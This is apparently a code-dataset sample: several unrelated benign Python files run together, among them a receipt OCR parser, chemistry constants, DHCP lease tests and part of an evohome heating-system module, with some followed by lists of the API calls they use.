"(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))")
for i in range(len(items)):
if pattern.match(items[i]) and not total_regex.match(items[i]) and not re.match("Total Tax", items[i]) and not re.match("Tax", items[i]) and not re.match("Sales Tax", items[i]) and not re.match("Visa", items[i]) and not re.match("Subtotal", items[i]):
orders.append(items[i])
price = "[0-9]+\.[0-9]+"
for i in orders:
p = re.findall(price, i)[0]
tally[i.split(p)[0]] = float(p)
tally2["store"] = first_line
for i in range(len(items)):
if "$" in items[i]:
currency = "USD"
elif "€" in items[i]:
currency = "EUR"
elif "£" in items[i]:
currency = "GBP"
else:
currency = "UKN"
if total_regex.match(items[i]) and not re.match("[$]?[0-9]+\.[0-9][0-9]", items[i]):
tot = items[i]
p = re.findall(price, tot)[0]
tally2["total"] = float(p)
break
else:
tot = -1
tally2["currency"] = currency
return tally, tally2
| [
"google.cloud.vision.types.Image",
"google.cloud.vision.ImageAnnotatorClient",
"re.match",
"re.findall",
"io.open",
"re.compile"
] | [((155, 184), 'google.cloud.vision.ImageAnnotatorClient', 'vision.ImageAnnotatorClient', ([], {}), '()\n', (182, 184), False, 'from google.cloud import vision\n'), ((331, 366), 'google.cloud.vision.types.Image', 'vision.types.Image', ([], {'content': 'content'}), '(content=content)\n', (349, 366), False, 'from google.cloud import vision\n'), ((1421, 1498), 're.compile', 're.compile', (['"""(([0-9]?[x]?[ ]?)([0-9a-zA-Z.\']+[ ])+[$£€]?[0-9]+\\\\.[0-9][0-9])"""'], {}), '("(([0-9]?[x]?[ ]?)([0-9a-zA-Z.\']+[ ])+[$£€]?[0-9]+\\\\.[0-9][0-9])")\n', (1431, 1498), False, 'import re\n'), ((1526, 1708), 're.compile', 're.compile', (['"""(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))"""'], {}), "(\n '(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))'\n )\n", (1536, 1708), False, 'import re\n'), ((242, 267), 'io.open', 'io.open', (['image_file', '"""rb"""'], {}), "(image_file, 'rb')\n", (249, 267), False, 'import io\n'), ((2101, 2121), 're.findall', 're.findall', (['price', 'i'], {}), '(price, i)\n', (2111, 2121), False, 'import re\n'), ((1820, 1851), 're.match', 're.match', (['"""Total Tax"""', 'items[i]'], {}), "('Total Tax', items[i])\n", (1828, 1851), False, 'import re\n'), ((1860, 1885), 're.match', 're.match', (['"""Tax"""', 'items[i]'], {}), "('Tax', items[i])\n", (1868, 1885), False, 'import re\n'), ((1894, 1925), 're.match', 're.match', (['"""Sales Tax"""', 'items[i]'], {}), "('Sales Tax', items[i])\n", (1902, 1925), False, 'import re\n'), ((1934, 1960), 're.match', 're.match', (['"""Visa"""', 'items[i]'], {}), "('Visa', items[i])\n", (1942, 1960), False, 'import re\n'), ((1969, 1999), 're.match', 're.match', (['"""Subtotal"""', 'items[i]'], {}), "('Subtotal', items[i])\n", (1977, 1999), False, 'import re\n'), ((2498, 2543), 're.match', 're.match', (['"""[$]?[0-9]+\\\\.[0-9][0-9]"""', 'items[i]'], {}), "('[$]?[0-9]+\\\\.[0-9][0-9]', items[i])\n", (2506, 2543), False, 'import re\n'), ((2587, 2609), 're.findall', 're.findall', (['price', 'tot'], {}), '(price, tot)\n', (2597, 2609), False, 'import re\n')] |
import numpy
""" Utility variables and functions
"""
aa2au = 1.8897261249935897 # bohr / AA
# converts nuclear charge to atom label
Z2LABEL = {
1: 'H', 2: 'He',
3: 'Li', 4: 'Be', 5: 'B', 6: 'C', 7: 'N', 8: 'O', 9: 'F', 10: 'Ne',
11: 'NA', 12: 'Mg', 13: 'Al', 14: 'Si', 15: 'P', 16: 'S', 17: 'Cl', 18: 'Ar'
}
# converts an atomic label to a nuclear charge
LABEL2Z = {}
for key in Z2LABEL:
LABEL2Z[Z2LABEL[key]] = key
# masses from UIPAC: http://www.chem.qmul.ac.uk/iupac/AtWt/
MASSES = {0: 0.00,
1: 1.00784, 2: 4.002602,
3: 6.938, 4: 9.01218, 5: 10.806, 6: 12.0096, 7: 14.00643, 8: 15.99903, 9: 18.998403, 10: 20.1797,
11: 22.9898, 12: 24.304, 13: 26.9815, 14: 28.084, 15: 30.973, 16: 32.059, 17: 35.446, 18: 39.948
}
# <NAME>al radii from Alvarez (2013), DOI: 2013/dt/c3dt50599e
# all values in Angstrom
VDWRADII = {0: 0.00,
1: 1.20, 2: 1.43,
3: 2.12, 4: 1.98, 5: 1.91, 6: 1.77, 7: 1.66, 8: 1.50, 9: 1.46, 10: 1.58,
11: 2.50, 12: 2.51, 13: 2.25, 14: 2.19, 15: 1.90, 16: 1.89, 17: 1.82, 18: 1.83
}
# Covalent radii from Pykko and Atsumi (2009), DOI: 0.1002/chem.200800987
# all values in Angstrom
COVALENTRADII = {0: 0.00,
1: 0.32, 2: 0.46,
3: 1.33, 4: 1.02, 5: 0.85, 6: 0.75, 7: 0.71, 8: 0.63, 9: 0.64, 10: 0.67,
11: 1.55, 12: 1.39, 13: 1.26, 14: 1.16, 15: 1.11, 16: 1.03, 17: 0.99, 18: 0.96
}
# Coordination numbers from Pykko and Atsumi (2009), DOI: 0.1002/chem.200800987
COORDINATION = {0: 0,
1: 1, 2: 1,
3: 1, 4: 2, 5: 3, 6: 4, 7: 3, 8: 2, 9: 1, 10: 1,
11: 1, 12: 2, 13: 3, 14: 4, 15: 3, 16: 2, 17: 1, 18: 1
}
def idamax(a):
""" Returns the index of maximum absolute value (positive or negative)
in the input array a.
Note: Loosely based of a subroutine in GAMESS with the same name
Arguments:
a -- a numpy array where we are to find the maximum
value in (either positive or negative)
Returns:
the index in the array where the maximum value is.
"""
idx = -1
v = 0.0
for i, value in enumerate(numpy.abs(a)):
if value > v:
idx = i
v = value
return idx
def idamin(a):
""" Returns the index of minimum absolute value (positive or negative)
in the input array a.
Arguments:
a -- a numpy array where we are to find the minimum
value in (either positive or negative)
Returns:
the index in the array where the maximum value is.
"""
idx = -1
v = 1.0e30
for i, value in enumerate(numpy.abs(a)):
if value < v:
idx = i
v = value
return idx
| [
"numpy.abs"
] | [((2360, 2372), 'numpy.abs', 'numpy.abs', (['a'], {}), '(a)\n', (2369, 2372), False, 'import numpy\n'), ((2851, 2863), 'numpy.abs', 'numpy.abs', (['a'], {}), '(a)\n', (2860, 2863), False, 'import numpy\n')] |
from Invoice import Invoice
def main():
items = [Invoice("RTX 2080", "VGA", 5, 10000000), Invoice("Intel i9 10900K", "Processor", 10, 8000000)]
for item in items:
print(item.part_num)
print(item.part_desc)
print(item.quantity)
print(item.price)
print("Total tagihanmu adalah", item.get_invoice_amount(), end="\n\n")
if __name__ == "__main__":
main()
| [
"Invoice.Invoice"
] | [((56, 95), 'Invoice.Invoice', 'Invoice', (['"""RTX 2080"""', '"""VGA"""', '(5)', '(10000000)'], {}), "('RTX 2080', 'VGA', 5, 10000000)\n", (63, 95), False, 'from Invoice import Invoice\n'), ((97, 149), 'Invoice.Invoice', 'Invoice', (['"""Intel i9 10900K"""', '"""Processor"""', '(10)', '(8000000)'], {}), "('Intel i9 10900K', 'Processor', 10, 8000000)\n", (104, 149), False, 'from Invoice import Invoice\n')] |
from django.contrib import admin
from polymorphic.admin import PolymorphicParentModelAdmin
from polymorphic.admin import PolymorphicChildModelAdmin
from csat.acquisition import get_collectors, models
class AcquisitionSessionConfigAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'started', 'completed', 'temporary',
'status')
admin.site.register(models.AcquisitionSessionConfig,
AcquisitionSessionConfigAdmin)
class DataCollectorConfigAdmin(PolymorphicChildModelAdmin):
base_model = models.DataCollectorConfig
class GenericDataCollectorConfigAdmin(PolymorphicParentModelAdmin):
list_display = ('id', 'name', 'session_config')
base_model = models.DataCollectorConfig
def get_child_models(self):
def iter_chldren():
for collector in get_collectors():
yield (collector.get_model(), DataCollectorConfigAdmin)
return tuple(iter_chldren())
admin.site.register(models.DataCollectorConfig,
GenericDataCollectorConfigAdmin)
| [
"csat.acquisition.get_collectors",
"django.contrib.admin.site.register"
] | [((360, 447), 'django.contrib.admin.site.register', 'admin.site.register', (['models.AcquisitionSessionConfig', 'AcquisitionSessionConfigAdmin'], {}), '(models.AcquisitionSessionConfig,\n AcquisitionSessionConfigAdmin)\n', (379, 447), False, 'from django.contrib import admin\n'), ((955, 1040), 'django.contrib.admin.site.register', 'admin.site.register', (['models.DataCollectorConfig', 'GenericDataCollectorConfigAdmin'], {}), '(models.DataCollectorConfig, GenericDataCollectorConfigAdmin\n )\n', (974, 1040), False, 'from django.contrib import admin\n'), ((826, 842), 'csat.acquisition.get_collectors', 'get_collectors', ([], {}), '()\n', (840, 842), False, 'from csat.acquisition import get_collectors, models\n')] |
from __future__ import print_function, division
import os
from os.path import exists
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from collections import OrderedDict
from lib.model import ImMatchNet
from lib.pf_willow_dataset import PFDataset
from lib.normalization import NormalizeImageDict
from lib.torch_util import BatchTensorToVars, str_to_bool
from lib.point_tnf import corr_to_matches
from lib.eval_util import pck_metric
from lib.dataloader import default_collate
from lib.torch_util import collate_custom
import argparse
print('NCNet evaluation script - PF Willow dataset')
use_cuda = torch.cuda.is_available()
# Argument parsing
parser = argparse.ArgumentParser(description='Compute PF Willow matches')
parser.add_argument('--checkpoint', type=str, default='')
parser.add_argument('--image_size', type=int, default=400)
parser.add_argument('--eval_dataset_path', type=str, default='datasets/', help='path to PF Willow dataset')
args = parser.parse_args()
# Create model
print('Creating CNN model...')
model = ImMatchNet(use_cuda=use_cuda,
checkpoint=args.checkpoint)
# Dataset and dataloader
Dataset = PFDataset
collate_fn = default_collate
csv_file = 'PF-dataset/test_pairs_pf.csv'
cnn_image_size = (args.image_size, args.image_size)
dataset = Dataset(csv_file=os.path.join(args.eval_dataset_path, csv_file),
dataset_path=args.eval_dataset_path,
transform=NormalizeImageDict(['source_image', 'target_image']),
output_size=cnn_image_size)
dataset.pck_procedure = 'scnet'
# Only batch_size=1 is supported for evaluation
batch_size = 1
dataloader = DataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0,
collate_fn=collate_fn)
batch_tnf = BatchTensorToVars(use_cuda=use_cuda)
model.eval()
# initialize vector for storing results
stats = {}
stats['point_tnf'] = {}
stats['point_tnf']['pck'] = np.zeros((len(dataset), 1))
# Compute
for i, batch in enumerate(dataloader):
batch = batch_tnf(batch)
batch_start_idx = batch_size * i
corr4d = model(batch)
# get matches
xA, yA, xB, yB, sB = corr_to_matches(corr4d, do_softmax=True)
matches = (xA, yA, xB, yB)
stats = pck_metric(batch, batch_start_idx, matches, stats, args, use_cuda)
print('Batch: [{}/{} ({:.0f}%)]'.format(i, len(dataloader), 100. * i / len(dataloader)))
# Print results
results = stats['point_tnf']['pck']
good_idx = np.flatnonzero((results != -1) * ~np.isnan(results))
print('Total: ' + str(results.size))
print('Valid: ' + str(good_idx.size))
filtered_results = results[good_idx]
print('PCK:', '{:.2%}'.format(np.mean(filtered_results))) | [
"lib.torch_util.BatchTensorToVars",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.path.join",
"lib.normalization.NormalizeImageDict",
"numpy.isnan",
"lib.point_tnf.corr_to_matches",
"numpy.mean",
"torch.cuda.is_available",
"lib.model.ImMatchNet",
"lib.eval_util.pck_metric"
] | [((656, 681), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (679, 681), False, 'import torch\n'), ((711, 775), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Compute PF Willow matches"""'}), "(description='Compute PF Willow matches')\n", (734, 775), False, 'import argparse\n'), ((1084, 1141), 'lib.model.ImMatchNet', 'ImMatchNet', ([], {'use_cuda': 'use_cuda', 'checkpoint': 'args.checkpoint'}), '(use_cuda=use_cuda, checkpoint=args.checkpoint)\n', (1094, 1141), False, 'from lib.model import ImMatchNet\n'), ((1700, 1799), 'torch.utils.data.DataLoader', 'DataLoader', (['dataset'], {'batch_size': 'batch_size', 'shuffle': '(False)', 'num_workers': '(0)', 'collate_fn': 'collate_fn'}), '(dataset, batch_size=batch_size, shuffle=False, num_workers=0,\n collate_fn=collate_fn)\n', (1710, 1799), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((1857, 1893), 'lib.torch_util.BatchTensorToVars', 'BatchTensorToVars', ([], {'use_cuda': 'use_cuda'}), '(use_cuda=use_cuda)\n', (1874, 1893), False, 'from lib.torch_util import BatchTensorToVars, str_to_bool\n'), ((2227, 2267), 'lib.point_tnf.corr_to_matches', 'corr_to_matches', (['corr4d'], {'do_softmax': '(True)'}), '(corr4d, do_softmax=True)\n', (2242, 2267), False, 'from lib.point_tnf import corr_to_matches\n'), ((2312, 2378), 'lib.eval_util.pck_metric', 'pck_metric', (['batch', 'batch_start_idx', 'matches', 'stats', 'args', 'use_cuda'], {}), '(batch, batch_start_idx, matches, stats, args, use_cuda)\n', (2322, 2378), False, 'from lib.eval_util import pck_metric\n'), ((1359, 1405), 'os.path.join', 'os.path.join', (['args.eval_dataset_path', 'csv_file'], {}), '(args.eval_dataset_path, csv_file)\n', (1371, 1405), False, 'import os\n'), ((1490, 1542), 'lib.normalization.NormalizeImageDict', 'NormalizeImageDict', (["['source_image', 'target_image']"], {}), "(['source_image', 'target_image'])\n", (1508, 1542), False, 'from lib.normalization import NormalizeImageDict\n'), ((2732, 2757), 'numpy.mean', 'np.mean', (['filtered_results'], {}), '(filtered_results)\n', (2739, 2757), True, 'import numpy as np\n'), ((2571, 2588), 'numpy.isnan', 'np.isnan', (['results'], {}), '(results)\n', (2579, 2588), True, 'import numpy as np\n')] |
import unittest
from ipaddress import IPv4Address, IPv6Address
from unittest.mock import patch
from utils.dhcp import parse_dhcp_lease_file
from utils.config_reader import ConfigData
def config_file_with_black_list(self):
return {
'dhcp': {
'lease_file': './dhcp_leases_test',
'ignore_hosts': ['orion']
}
}
class TestDHCP(unittest.TestCase):
def setUp(self):
dhcp_lease_file = './dhcp_leases_test'
self.dhcp_data = parse_dhcp_lease_file(dhcp_lease_file)
def test_data_parsing(self):
self.assertEqual(3, len(self.dhcp_data.keys()))
def test_ipv4_parsing(self):
ipv4_count = 0
for v in self.dhcp_data.values():
if v.get('ipv4'):
if isinstance(v['ipv4'], IPv4Address):
ipv4_count += 1
self.assertEqual(3, ipv4_count)
def test_ipv6_parsing(self):
ipv6_count = 0
for v in self.dhcp_data.values():
if v.get('ipv6'):
if isinstance(v['ipv6'], IPv6Address):
ipv6_count += 1
self.assertEqual(1, ipv6_count)
@patch.object(ConfigData, 'get_dhcp_info', config_file_with_black_list)
def test_ignore_host(self):
dhcp_data = parse_dhcp_lease_file('./dhcp_leases_test')
self.assertEqual(
'58:40:4e:b9:08:f0' in dhcp_data.keys(),
False
)
| [
"unittest.mock.patch.object",
"utils.dhcp.parse_dhcp_lease_file"
] | [((1180, 1250), 'unittest.mock.patch.object', 'patch.object', (['ConfigData', '"""get_dhcp_info"""', 'config_file_with_black_list'], {}), "(ConfigData, 'get_dhcp_info', config_file_with_black_list)\n", (1192, 1250), False, 'from unittest.mock import patch\n'), ((523, 561), 'utils.dhcp.parse_dhcp_lease_file', 'parse_dhcp_lease_file', (['dhcp_lease_file'], {}), '(dhcp_lease_file)\n', (544, 561), False, 'from utils.dhcp import parse_dhcp_lease_file\n'), ((1303, 1346), 'utils.dhcp.parse_dhcp_lease_file', 'parse_dhcp_lease_file', (['"""./dhcp_leases_test"""'], {}), "('./dhcp_leases_test')\n", (1324, 1346), False, 'from utils.dhcp import parse_dhcp_lease_file\n')] |
import pickle
import easymunk as p
class TestShapeFilter:
def test_init(self) -> None:
f = p.ShapeFilter()
assert f.group == 0
assert f.categories == 0xFFFFFFFF
assert f.mask == 0xFFFFFFFF
f = p.ShapeFilter(1, 2, 3)
assert f.group == 1
assert f.categories == 2
assert f.mask == 3
def test_constants(self) -> None:
assert p.ShapeFilter.ALL_MASKS() == 0xFFFFFFFF
assert p.ShapeFilter.ALL_CATEGORIES() == 0xFFFFFFFF
def test_eq(self) -> None:
f1 = p.ShapeFilter(1, 2, 3)
f2 = p.ShapeFilter(1, 2, 3)
f3 = p.ShapeFilter(2, 3, 4)
assert f1 == f2
assert f1 != f3
def test_pickle(self) -> None:
x = p.ShapeFilter(1, 2, 3)
s = pickle.dumps(x, 2)
actual = pickle.loads(s)
assert x == actual
class TestContactPoint:
pass
class TestContactPointSet:
pass
| [
"pickle.loads",
"easymunk.ShapeFilter",
"easymunk.ShapeFilter.ALL_CATEGORIES",
"easymunk.ShapeFilter.ALL_MASKS",
"pickle.dumps"
] | [((107, 122), 'easymunk.ShapeFilter', 'p.ShapeFilter', ([], {}), '()\n', (120, 122), True, 'import easymunk as p\n'), ((242, 264), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (255, 264), True, 'import easymunk as p\n'), ((552, 574), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (565, 574), True, 'import easymunk as p\n'), ((588, 610), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (601, 610), True, 'import easymunk as p\n'), ((624, 646), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(2)', '(3)', '(4)'], {}), '(2, 3, 4)\n', (637, 646), True, 'import easymunk as p\n'), ((743, 765), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (756, 765), True, 'import easymunk as p\n'), ((778, 796), 'pickle.dumps', 'pickle.dumps', (['x', '(2)'], {}), '(x, 2)\n', (790, 796), False, 'import pickle\n'), ((814, 829), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (826, 829), False, 'import pickle\n'), ((407, 432), 'easymunk.ShapeFilter.ALL_MASKS', 'p.ShapeFilter.ALL_MASKS', ([], {}), '()\n', (430, 432), True, 'import easymunk as p\n'), ((462, 492), 'easymunk.ShapeFilter.ALL_CATEGORIES', 'p.ShapeFilter.ALL_CATEGORIES', ([], {}), '()\n', (490, 492), True, 'import easymunk as p\n')] |
#!/usr/bin/env python3
# coding: utf-8
from .BaseType import BaseType
from ..Manager import Register
import re
class Integer(BaseType):
'''Integer type
An Integer is a number that can be written without a fractional component.
An Integer is only compose of digits from 0 to 9.
'''
name = 'int'
def format(self, value):
'''Format string to Integer'''
return int(value)
def detect(self, value):
'''Is value an Integer ?
Test if value is only compose of digits from 0 to 9.
'''
return re.match(r'^-?[0-9]+$', value) is not None
def fromBytes(self, _bytes):
'''Convert bytes to Integer using big endian'''
return int.from_bytes(_bytes, 'big')
def toBytes(self, value):
'''Convert Integer to bytes using big endian'''
return value.to_bytes(max(1, (value.bit_length() + 7) // 8), 'big')
def toString(self, value):
'''Return value as string'''
return str(value)
# Register the type
Register.registerType(Integer())
| [
"re.match"
] | [((575, 604), 're.match', 're.match', (['"""^-?[0-9]+$"""', 'value'], {}), "('^-?[0-9]+$', value)\n", (583, 604), False, 'import re\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
"""Evohome RF - The evohome-compatible system."""
import logging
from asyncio import Task
from datetime import timedelta as td
from threading import Lock
from typing import List, Optional
from .command import Command, FaultLog, Priority
from .const import (
ATTR_DEVICES,
DEVICE_HAS_ZONE_SENSOR,
DISCOVER_ALL,
DISCOVER_PARAMS,
DISCOVER_SCHEMA,
DISCOVER_STATUS,
SystemMode,
SystemType,
__dev_mode__,
)
from .devices import Device, Entity
from .exceptions import CorruptStateError, ExpiredCallbackError
from .schema import (
ATTR_CONTROLLER,
ATTR_DHW_SYSTEM,
ATTR_HTG_CONTROL,
ATTR_HTG_SYSTEM,
ATTR_ORPHANS,
ATTR_UFH_SYSTEM,
ATTR_ZONES,
DISABLE_DISCOVERY,
MAX_ZONES,
)
from .zones import DhwZone, Zone
DEV_MODE = __dev_mode__
_LOGGER = logging.getLogger(__name__)
if DEV_MODE:
_LOGGER.setLevel(logging.DEBUG)
class SysFaultLog: # 0418
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._fault_log = FaultLog(self._ctl)
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._gwy._tasks.append(self._loop.create_task(self.get_fault_log()))
async def get_fault_log(self, force_refresh=None) -> Optional[dict]: # 0418
try:
return await self._fault_log.get_fault_log(force_refresh=force_refresh)
except ExpiredCallbackError:
return
@property
def status(self) -> dict:
status = super().status
assert "fault_log" not in status # TODO: removeme
status["fault_log"] = self._fault_log.fault_log
status["last_fault"] = self._msgz[" I"].get("0418")
return status
class SysDatetime: # 313F
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._datetime = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._gwy.send_cmd(Command.get_system_time(self.id))
# self._send_cmd("313F")
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "313F" and msg.verb in (" I", "RP"): # TODO: W
self._datetime = msg
@property
def datetime(self) -> Optional[str]:
return self._msg_payload(self._datetime, "datetime") # TODO: make a dt object
# def wait_for(self, cmd, callback):
# self._api_lock.acquire()
# self._send_cmd("313F", verb="RQ", callback=callback)
# time_start = dt.now()
# while not self._schedule_done:
# await asyncio.sleep(TIMER_SHORT_SLEEP)
# if dt.now() > time_start + TIMER_LONG_TIMEOUT:
# self._api_lock.release()
# raise ExpiredCallbackError("failed to set schedule")
# self._api_lock.release()
# async def get_datetime(self) -> str: # wait for the RP/313F
# await self.wait_for(Command("313F", verb="RQ"))
# return self.datetime
# async def set_datetime(self, dtm: dt) -> str: # wait for the I/313F
# await self.wait_for(Command("313F", verb=" W", payload=f"00{dtm_to_hex(dtm)}"))
# return self.datetime
@property
def status(self) -> dict:
status = super().status
assert ATTR_HTG_SYSTEM in status # TODO: removeme
assert "datetime" not in status[ATTR_HTG_SYSTEM] # TODO: removeme
status[ATTR_HTG_SYSTEM]["datetime"] = self.datetime
return status
class SysLanguage: # 0100
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._language = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_PARAMS:
self._send_cmd("0100") # language
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "0100" and msg.verb in (" I", "RP"):
self._language = msg
@property
def language(self) -> Optional[str]: # 0100
return self._msg_payload(self._language, "language")
@property
def params(self) -> dict:
params = super().params
assert ATTR_HTG_SYSTEM in params # TODO: removeme
assert "language" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["language"] = self.language
return params
class SysMode: # 2E04
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._system_mode = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
# self._send_cmd("2E04", payload="FF") # system mode
self._gwy.send_cmd(Command.get_system_mode(self.id))
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "2E04" and msg.verb in (" I", "RP"): # this is a special case
self._system_mode = msg
@property
def system_mode(self) -> Optional[dict]: # 2E04
return self._msg_payload(self._system_mode)
def set_mode(self, system_mode=None, until=None) -> Task:
"""Set a system mode for a specified duration, or indefinitely."""
cmd = Command.set_system_mode(self.id, system_mode=system_mode, until=until)
return self._gwy.send_cmd(cmd)
def set_auto(self) -> Task:
"""Revert system to Auto, set non-PermanentOverride zones to FollowSchedule."""
return self.set_mode(SystemMode.AUTO)
def reset_mode(self) -> Task:
"""Revert system to Auto, force *all* zones to FollowSchedule."""
return self.set_mode(SystemMode.RESET)
@property
def params(self) -> dict:
params = super().params
assert ATTR_HTG_SYSTEM in params # TODO: removeme
assert "system_mode" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["system_mode"] = self.system_mode
return params
class StoredHw:
MIN_SETPOINT = 30.0 # NOTE: these may be removed
MAX_SETPOINT = 85.0
DEFAULT_SETPOINT = 50.0
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._dhw = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
pass
def _handle_msg(self, msg, prev_msg=None):
"""Eavesdrop packets, or pairs of packets, to maintain the system state."""
def OUT_find_dhw_sensor(this):
"""Discover the stored HW this system (if any).
There is only 2 ways to to find a controller's DHW sensor:
1. The 10A0 RQ/RP *from/to a 07:* (1x/4h) - reliable
2. Use sensor temp matching - non-deterministic
Data from the CTL is considered more authorative. The RQ is initiated by the
DHW, so is not authorative. The I/1260 is not to/from a controller, so is
not useful.
"""
# 10A0: RQ/07/01, RP/01/07: can get both parent controller & DHW sensor
# 047 RQ --- 07:030741 01:102458 --:------ 10A0 006 00181F0003E4
# 062 RP --- 01:102458 07:030741 --:------ 10A0 006 0018380003E8
# 1260: I/07: can't get which parent controller - need to match temps
# 045 I --- 07:045960 --:------ 07:045960 1260 003 000911
# 1F41: I/01: get parent controller, but not DHW sensor
# 045 I --- 01:145038 --:------ 01:145038 1F41 012 000004FFFFFF1E060E0507E4
# 045 I --- 01:145038 --:------ 01:145038 1F41 006 000002FFFFFF
sensor = None
if this.code == "10A0" and this.verb == "RP":
if this.src is self and this.dst.type == "07":
sensor = this.dst
if sensor is not None:
if self.dhw is None:
self._get_zone("FA")
self.dhw._set_sensor(sensor)
super()._handle_msg(msg)
if msg.code in ("10A0", "1260"): # self.dhw.sensor is None and
# if self.dhw.sensor is None:
# find_dhw_sensor(msg)
pass
elif msg.code in ("1F41",): # dhw_mode
pass
def _get_zone(self, zone_idx, sensor=None, **kwargs) -> DhwZone:
"""Return a DHW zone (will create it if required).
Can also set a DHW zone's sensor & valves?.
"""
def create_dhw(zone_idx) -> DhwZone:
if self.dhw:
raise LookupError(f"Duplicate stored HW: {zone_idx}")
dhw = self._dhw = DhwZone(self)
if not self._gwy.config[DISABLE_DISCOVERY]:
dhw._discover() # discover_flag=DISCOVER_ALL)
return dhw
if zone_idx != "HW":
return
zone = self.dhw # TODO: self.zone_by_idx.get("HW") too?
if zone is None:
zone = create_dhw(zone_idx)
if kwargs.get("dhw_valve"):
zone._set_dhw_valve(kwargs["dhw_valve"])
if kwargs.get("htg_valve"):
zone._set_dhw_valve(kwargs["htg_valve"])
if sensor is not None:
zone._set_dhw_sensor(sensor)
return zone
@property
def dhw(self) -> DhwZone:
return self._dhw
def _set_dhw(self, dhw: DhwZone) -> None: # self._dhw
"""Set the DHW zone system."""
if not isinstance(dhw, DhwZone):
raise TypeError(f"stored_hw can't be: {dhw}")
if self._dhw is not None:
if self._dhw is dhw:
return
raise CorruptStateError("DHW shouldn't change: {self._dhw} to {dhw}")
if self._dhw is None:
# self._gwy._get_device(xxx)
# self.add_device(dhw.sensor)
# self.add_device(dhw.relay)
self._dhw = dhw
@property
def dhw_sensor(self) -> Device:
return self._dhw._dhw_sensor if self._dhw else None
@property
def hotwater_valve(self) -> Device:
return self._dhw._dhw_valve if self._dhw else None
@property
def heating_valve(self) -> Device:
return self._dhw._htg_valve if self._dhw else None
@property
def schema(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().schema # TODO: removeme
return {**super().schema, ATTR_DHW_SYSTEM: self.dhw.schema if self.dhw else {}}
@property
def params(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().params # TODO: removeme
return {**super().params, ATTR_DHW_SYSTEM: self.dhw.params if self.dhw else {}}
@property
def status(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().status # TODO: removeme
return {**super().status, ATTR_DHW_SYSTEM: self.dhw.status if self.dhw else {}}
class MultiZone: # 0005 (+/- 000C?)
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.zones = []
self.zone_by_idx = {}
# self.zone_by_name = {}
self.zone_lock = Lock()
self.zone_lock_idx = None
# self._prev_30c9 = None # OUT: used to discover zone sensors
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_SCHEMA:
[ # 0005: find any zones + their type (RAD, UFH, VAL, MIX, ELE)
self._send_cmd("0005", payload=f"00{zone_type}")
for zone_type in ("08", "09", "0A", "0B", "11") # CODE_0005_ZONE_TYPE
]
[ # 0005: find any others - as per an RFG100
self._send_cmd("0005", payload=f"00{zone_type}")
for zone_type in ("00", "04", "0C", "0F", "10")
]
if discover_flag & DISCOVER_STATUS:
self._send_cmd("0006")
def _handle_msg(self, msg, prev_msg=None):
def OUT_find_zone_sensors() -> None:
"""Determine each zone's sensor by matching zone/sensor temperatures.
The temperature of each zone is reliably known (30C9 array), but the sensor
for each zone is not. In particular, the controller may be a sensor for a
zone, but unfortunately it does not announce its sensor temperatures.
